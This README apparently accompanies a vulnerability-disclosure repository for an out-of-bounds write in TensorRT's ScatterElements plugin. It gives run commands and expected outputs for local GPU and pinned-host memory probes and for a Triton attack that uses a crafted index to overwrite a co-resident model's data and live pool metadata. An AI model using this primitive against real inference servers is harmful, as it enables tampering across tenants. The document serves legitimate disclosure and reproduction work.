library_name: tensorrt
tags:
  - security-research
  - vulnerability-reproduction
  - tensorrt
  - triton-inference-server

TensorRT ScatterElements GPU and mapped-host OOB write PoC

This repository demonstrates that the stock TensorRT ScatterElements plugin applies runtime index values directly in GPU pointer arithmetic, without normalizing negative indices or validating bounds.
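To make the arithmetic concrete, here is a minimal host-side sketch in plain Python of where an index lands when it is multiplied into a byte offset without any checks. It is not the plugin's code: `classify_raw_index` is a hypothetical helper, and the 1-D layout and 4-byte element size are assumptions chosen for illustration.

```python
def classify_raw_index(index: int, num_elements: int, elem_size: int = 4):
    """Return (byte_offset, location) for an index used without checks.

    Assumption: a 1-D buffer of `num_elements` items, each `elem_size`
    bytes wide, addressed as base + index * elem_size.
    """
    byte_offset = index * elem_size
    buffer_bytes = num_elements * elem_size
    if byte_offset < 0:
        location = "before buffer"
    elif byte_offset >= buffer_bytes:
        location = "past end of buffer"
    else:
        location = "inside buffer"
    return byte_offset, location


if __name__ == "__main__":
    # An in-range index, the negative index -1, and a too-large index.
    for idx in (3, -1, 8):
        print(idx, classify_raw_index(idx, num_elements=8))
```

Under these assumptions, index -1 resolves to a negative byte offset rather than to the last element, which is the behaviour the proof below checks for.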

Tested configurations:

TensorRT 11.1.0.106 on Windows
TensorRT 10.16.1.11 on Linux
Triton Inference Server 2.69.0 with TensorRT 10.16.1.11
NVIDIA RTX 3080 Laptop GPU

The artifacts are synthetic. They do not execute host code or access files.

Local primitive

Build the engine and run the local proof:

python make_engine.py
python run_probe.py

The proof checks three cases:

An out-of-range positive index updates a separate CUDA allocation.
The documented-valid index -1 writes before the output buffer instead of selecting its last element.
An in-range control leaves the marker allocation unchanged.
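For comparison, the behaviour the three cases are measured against can be sketched as a pure-Python reference for a 1-D scatter. This is an illustrative sketch of the ONNX-style semantics (negative indices count from the end, anything else out of range is rejected), not TensorRT code; `scatter_elements_1d` is a hypothetical name.

```python
def scatter_elements_1d(data, indices, updates):
    """Reference 1-D scatter with index normalization and bounds checks.

    Returns a new list; `data` is left unmodified.
    """
    if len(indices) != len(updates):
        raise ValueError("indices and updates must have the same length")
    out = list(data)
    n = len(out)
    for idx, value in zip(indices, updates):
        # Valid indices lie in [-n, n - 1]; everything else is rejected.
        if not -n <= idx < n:
            raise IndexError(f"index {idx} is outside [-{n}, {n - 1}]")
        # For idx in [-n, n), idx % n maps negatives onto [0, n).
        out[idx % n] = value
    return out


if __name__ == "__main__":
    base = [0.0, 0.0, 0.0, 0.0]
    print(scatter_elements_1d(base, [1], [7.0]))   # in-range control
    print(scatter_elements_1d(base, [-1], [7.0]))  # selects the last element
```

With this reference, an out-of-range positive index raises `IndexError` instead of touching memory outside the output.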

host_pinned_probe.py additionally targets a benign marker in pinned host memory, allocated with the cudaHostAllocPortable flag, through its CUDA device mapping:

python host_pinned_probe.py

Expected result:

CROSS_ALLOCATION_WRITE=True
VALID_NEGATIVE_INDEX_OOB_WRITE=True
CONTROL_CLEAN=True
MAPPED_HOST_WRITE=True
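If you capture the output of the probes to a file, a small checker along these lines can confirm that all four flags came back as expected. It is a sketch that assumes the scripts print exactly the `KEY=True` lines shown above; `parse_flags` and `all_expected_true` are hypothetical helpers, not part of the repository.

```python
EXPECTED_FLAGS = (
    "CROSS_ALLOCATION_WRITE",
    "VALID_NEGATIVE_INDEX_OOB_WRITE",
    "CONTROL_CLEAN",
    "MAPPED_HOST_WRITE",
)


def parse_flags(text: str) -> dict:
    """Collect KEY=VALUE lines into a dict of booleans (True only for 'True')."""
    flags = {}
    for line in text.splitlines():
        line = line.strip()
        if "=" not in line:
            continue
        key, _, value = line.partition("=")
        flags[key.strip()] = value.strip() == "True"
    return flags


def all_expected_true(text: str) -> bool:
    """True only if every expected flag is present and set to True."""
    flags = parse_flags(text)
    return all(flags.get(name, False) for name in EXPECTED_FLAGS)


if __name__ == "__main__":
    sample = "\n".join(f"{name}=True" for name in EXPECTED_FLAGS)
    print(all_expected_true(sample))
```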

Triton cross-model proof

The Linux plans were built with TensorRT 10.16.1.11:

scatter_elements_trt10.plan
victim_slow_trt10.plan

start_triton.sh expects the official Triton 2.69.0 standalone bundle under ~/triton-2.69/server/tritonserver and the Python environment under ~/triton-2.69/venv.
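Before launching, it can help to confirm that both locations exist. The following pre-flight check is a sketch, not part of the repository: `missing_triton_paths` is a hypothetical helper, and it only tests that the two paths named above are present, not that their contents are correct.

```python
from pathlib import Path

# Paths that start_triton.sh expects, relative to the home directory.
REQUIRED_PATHS = (
    "triton-2.69/server/tritonserver",
    "triton-2.69/venv",
)


def missing_triton_paths(home=None):
    """Return the expected paths that do not exist under `home`."""
    root = Path(home) if home is not None else Path.home()
    return [str(root / rel) for rel in REQUIRED_PATHS if not (root / rel).exists()]


if __name__ == "__main__":
    missing = missing_triton_paths()
    if missing:
        print("Missing:", *missing, sep="\n  ")
    else:
        print("Triton layout looks complete.")
```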

Run the control and attack:

# control
./start_triton.sh
python triton_setup.py
python triton_race_probe.py --skip-load 0 200 0.0

# attack
./start_triton.sh
python triton_setup.py
python triton_race_probe.py --skip-load 740 200 0.0

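triton_setup.py uses Triton's model-load API to automate the setup an operator would otherwise perform by hand. With --skip-load, triton_race_probe.py makes no model-control request; the attack phase consists solely of ordinary inference requests to the deployed scatter_writer model while a co-resident model is executing. The first positional argument is the scatter index (0 for the in-range control run, 740 for the attack run) and the second is the number of inference requests.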

Expected result:

# control
victim_before=31343.25
victim_after=31343.25
TARGET_CHANGED=False

# attack
victim_before=31343.25
victim_after=32680.5
TARGET_CHANGED=True
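The TARGET_CHANGED verdict is simply a comparison of the two victim values. A sketch of recomputing it from a saved log is shown below; it assumes the log contains the `victim_before=` and `victim_after=` lines exactly as printed above, and `parse_victim_values` and `target_changed` are hypothetical helpers rather than code from the repository.

```python
def parse_victim_values(text: str) -> dict:
    """Extract victim_before / victim_after as floats, skipping '#' comment lines."""
    values = {}
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("#") or "=" not in line:
            continue
        key, _, raw = line.partition("=")
        if key in ("victim_before", "victim_after"):
            values[key] = float(raw)
    return values


def target_changed(text: str) -> bool:
    """True if the victim value differs between the before and after readings."""
    values = parse_victim_values(text)
    return values["victim_after"] != values["victim_before"]


if __name__ == "__main__":
    control = "# control\nvictim_before=31343.25\nvictim_after=31343.25\n"
    attack = "# attack\nvictim_before=31343.25\nvictim_after=32680.5\n"
    print(target_changed(control), target_changed(attack))
```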

The result for the fixed index 740 was reproduced against fresh, uninstrumented Triton processes. cuda_trace.c is included only to document how the relative GPU offset was initially measured; it is not loaded for the final control or attack runs.

The same primitive reaches Triton's CUDA-pinned host pool. triton_host_metadata_output.txt records a remote inference request changing a live pool metadata word at 0x204c00030 from 0x10000000 to 0x44a72800. GDB was used only to read the before/after bytes; the server and attack request were uninstrumented.

Evidence

windows_stock_output.txt: local TensorRT 11.1 proof
linux_stock_output.txt: local TensorRT 10.16 proof
triton_control_output.txt: 200 in-range inference requests
triton_attack_repeatability.txt: three fresh Triton attack runs
windows_host_pinned_output.txt and linux_host_pinned_output.txt: mapped host-marker writes
triton_host_metadata_output.txt: remote write into live Triton pinned-pool metadata

SHA-256

02cc96cfa0c55c21058c0266ec85f72326f0c19cf245f01dac95f858d20c16fd  scatter_elements.engine
37640bd4f3d153cb23e3e147f8127d7ce0558065fd09de21593d9a26f52bc4ae  scatter_elements_trt10.plan
1f51adc48f98615d548a5a3a7f0f320e3c1b23e7f48205b21554ba850379d7b0  victim_slow_trt10.plan
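To check downloaded artifacts against these digests, something like the following sketch can be used. It relies only on the standard library; `sha256_of` and `verify_manifest` are hypothetical helper names, and the manifest format (digest, whitespace, file name) is assumed to match the listing above.

```python
import hashlib
from pathlib import Path

MANIFEST = """\
02cc96cfa0c55c21058c0266ec85f72326f0c19cf245f01dac95f858d20c16fd  scatter_elements.engine
37640bd4f3d153cb23e3e147f8127d7ce0558065fd09de21593d9a26f52bc4ae  scatter_elements_trt10.plan
1f51adc48f98615d548a5a3a7f0f320e3c1b23e7f48205b21554ba850379d7b0  victim_slow_trt10.plan
"""


def sha256_of(path, chunk_size=1 << 20) -> str:
    """Hash a file in chunks so large engine files are not read into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_manifest(manifest_text: str, base_dir=".") -> dict:
    """Map each listed file name to True if it exists and its digest matches."""
    results = {}
    for line in manifest_text.splitlines():
        parts = line.split()
        if len(parts) != 2:
            continue  # skip blank or malformed lines
        expected, name = parts
        path = Path(base_dir) / name
        results[name] = path.is_file() and sha256_of(path) == expected.lower()
    return results


if __name__ == "__main__":
    for name, ok in verify_manifest(MANIFEST).items():
        print(f"{'OK      ' if ok else 'MISMATCH'}  {name}")
```

A missing file is reported the same way as a digest mismatch, so a clean run means every listed artifact is present and unmodified.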